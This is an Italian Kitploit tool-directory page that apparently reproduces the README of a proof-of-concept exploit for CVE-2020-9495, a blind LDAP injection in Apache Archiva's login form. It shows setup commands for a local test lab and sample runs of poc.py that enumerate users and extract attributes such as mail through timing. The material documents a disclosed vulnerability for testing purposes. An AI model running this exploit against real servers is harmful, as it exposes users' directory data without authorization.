Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/ggolawski/cve-2020-9495
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebRaccolta InformazioniPenetration Testing
GitHubggolawski/cve-2020-9495

CVE-2020-9495

Proof-of-concept exploit per CVE-2020-9495, una vulnerabilità di iniezione LDAP in Apache Archiva. Enumera gli utenti LDAP ed esfiltra valori arbitrari di attributi tramite iniezione cieca.

Vedi Repository
816 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2020-9495 PoC

La CVE-2020-9495 è una vulnerabilità di iniezione LDAP di gravità media in Apache Archiva precedente alla versione 2.2.5. Consente a un attaccante di recuperare qualsiasi valore di attributo LDAP degli utenti presenti sul server LDAP.

Dall'avviso ufficiale di Apache Archiva:

Fornendo valori speciali al modulo di login di Archiva, un attaccante è in grado di recuperare i dati degli attributi utente dal server LDAP connesso. Con determinati caratteri è possibile modificare il filtro LDAP usato per interrogare gli utenti sul server LDAP connesso. Misurando il tempo di risposta, è possibile recuperare dati arbitrari degli attributi dagli oggetti utente LDAP.

PoC

Lo script poc.py dimostra come un attaccante non autorizzato possa enumerare gli utenti su un server LDAP integrato con Archiva e recuperare il valore di qualsiasi attributo di qualsiasi utente.

Server di test Archiva locale

Salta questo passaggio se hai già un server Archiva con autenticazione LDAP abilitata.

  1. Scarica Archiva 2.2.4 ed estrailo

    root@kitploit:~
    $ wget https://archive.apache.org/dist/archiva/2.2.4/binaries/apache-archiva-2.2.4-bin.tar.gz
    $ tar -zxf apache-archiva-2.2.4-bin.tar.gz
    
  • Esegui il server OpenLDAP

    root@kitploit:~
    $ docker run -p 2389:389 --name my-openldap-container osixia/openldap:1.3.0
    
  • Importa gli utenti da users.ldif in LDAP

    root@kitploit:~
    $ ldapadd -x -D "cn=admin,dc=example,dc=org" -w admin -H ldap://localhost:2389 -f users.ldif
    
  • Esegui il server Archiva

    root@kitploit:~
    $ bin/archiva console
    
  • Abilita e configura l'autenticazione LDAP tramite interfaccia web

  • Enumera gli utenti

    root@kitploit:~
    $ ./poc.py --url http://127.0.0.1:8080
    [INFO] Enumerating users from http://127.0.0.1:8080
    [INFO] Calibration...
    [INFO] Calibration done
    admin1
    admin2
    admin3
    admin4
    admin5
    admin6
    admin7
    user1
    user2
    user3
    user4
    

    Recupera i valori degli attributi LDAP dell'utente admin1

    root@kitploit:~
    $ ./poc.py --url http://127.0.0.1:8080 --user admin1 --attr mail
    [INFO] Exfiltrating mail attribute of admin1 user from http://127.0.0.1:8080
    [INFO] Calibration...
    [INFO] Calibration done
    [email protected]
    $ ./poc.py --url http://127.0.0.1:8080 --user admin1 --attr givenName
    [INFO] Exfiltrating givenName attribute of admin1 user from http://127.0.0.1:8080
    [INFO] Calibration...
    [INFO] Calibration done
    admin1
    $ ./poc.py --url http://127.0.0.1:8080 --user admin1 --attr sn
    [INFO] Exfiltrating sn attribute of admin1 user from http://127.0.0.1:8080
    [INFO] Calibration...
    [INFO] Calibration done
    last
    
    Scarica lo strumento